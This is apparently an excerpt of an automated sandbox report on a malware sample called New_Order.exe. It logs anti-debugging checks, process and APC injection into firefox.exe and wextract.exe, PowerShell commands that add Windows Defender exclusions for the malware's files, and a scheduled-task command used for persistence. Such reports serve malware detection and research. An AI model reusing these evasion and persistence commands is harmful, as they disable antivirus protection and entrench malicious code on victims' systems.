            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A4A35 mov eax, dword ptr fs:[00000030h]10_2_012A4A35
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012A4A35 mov eax, dword ptr fs:[00000030h]10_2_012A4A35
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0130CA11 mov eax, dword ptr fs:[00000030h]10_2_0130CA11
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BCA6F mov eax, dword ptr fs:[00000030h]10_2_012BCA6F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BCA6F mov eax, dword ptr fs:[00000030h]10_2_012BCA6F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BCA6F mov eax, dword ptr fs:[00000030h]10_2_012BCA6F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0132EA60 mov eax, dword ptr fs:[00000030h]10_2_0132EA60
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FCA72 mov eax, dword ptr fs:[00000030h]10_2_012FCA72
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012FCA72 mov eax, dword ptr fs:[00000030h]10_2_012FCA72
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290A5B mov eax, dword ptr fs:[00000030h]10_2_01290A5B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01290A5B mov eax, dword ptr fs:[00000030h]10_2_01290A5B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01286A50 mov eax, dword ptr fs:[00000030h]10_2_01286A50
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288AA0 mov eax, dword ptr fs:[00000030h]10_2_01288AA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01288AA0 mov eax, dword ptr fs:[00000030h]10_2_01288AA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D6AA4 mov eax, dword ptr fs:[00000030h]10_2_012D6AA4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0128EA80 mov eax, dword ptr fs:[00000030h]10_2_0128EA80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01354A80 mov eax, dword ptr fs:[00000030h]10_2_01354A80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B8A90 mov edx, dword ptr fs:[00000030h]10_2_012B8A90
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BAAEE mov eax, dword ptr fs:[00000030h]10_2_012BAAEE
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012BAAEE mov eax, dword ptr fs:[00000030h]10_2_012BAAEE
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D6ACC mov eax, dword ptr fs:[00000030h]10_2_012D6ACC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D6ACC mov eax, dword ptr fs:[00000030h]10_2_012D6ACC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012D6ACC mov eax, dword ptr fs:[00000030h]10_2_012D6ACC
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01280AD0 mov eax, dword ptr fs:[00000030h]10_2_01280AD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B4AD0 mov eax, dword ptr fs:[00000030h]10_2_012B4AD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B4AD0 mov eax, dword ptr fs:[00000030h]10_2_012B4AD0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01308D20 mov eax, dword ptr fs:[00000030h]10_2_01308D20
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01338D10 mov eax, dword ptr fs:[00000030h]10_2_01338D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01338D10 mov eax, dword ptr fs:[00000030h]10_2_01338D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129AD00 mov eax, dword ptr fs:[00000030h]10_2_0129AD00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129AD00 mov eax, dword ptr fs:[00000030h]10_2_0129AD00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0129AD00 mov eax, dword ptr fs:[00000030h]10_2_0129AD00
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012B4D1D mov eax, dword ptr fs:[00000030h]10_2_012B4D1D
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01276D10 mov eax, dword ptr fs:[00000030h]10_2_01276D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_01276D10 mov eax, dword ptr fs:[00000030h]10_2_01276D10
            Source: C:\Users\user\Desktop\New_Order.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\wextract.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\wextract.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004171A3 LdrLoadDll,10_2_004171A3
            Source: C:\Users\user\Desktop\New_Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\New_Order.exeSection loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeSection loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: unknown target: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\QjSljS.exe protection: execute and read and write
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeSection loaded: unknown target: C:\Windows\SysWOW64\wextract.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\wextract.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\New_Order.exeMemory written: C:\Users\user\Desktop\New_Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeMemory written: C:\Users\user\AppData\Roaming\QjSljS.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\wextract.exeThread APC queued: target process: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmpJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exeJump to behavior
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exeJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000000.1769900327.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4166146037.0000000001331000.00000002.00000001.00040000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816354362.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Users\user\Desktop\New_Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
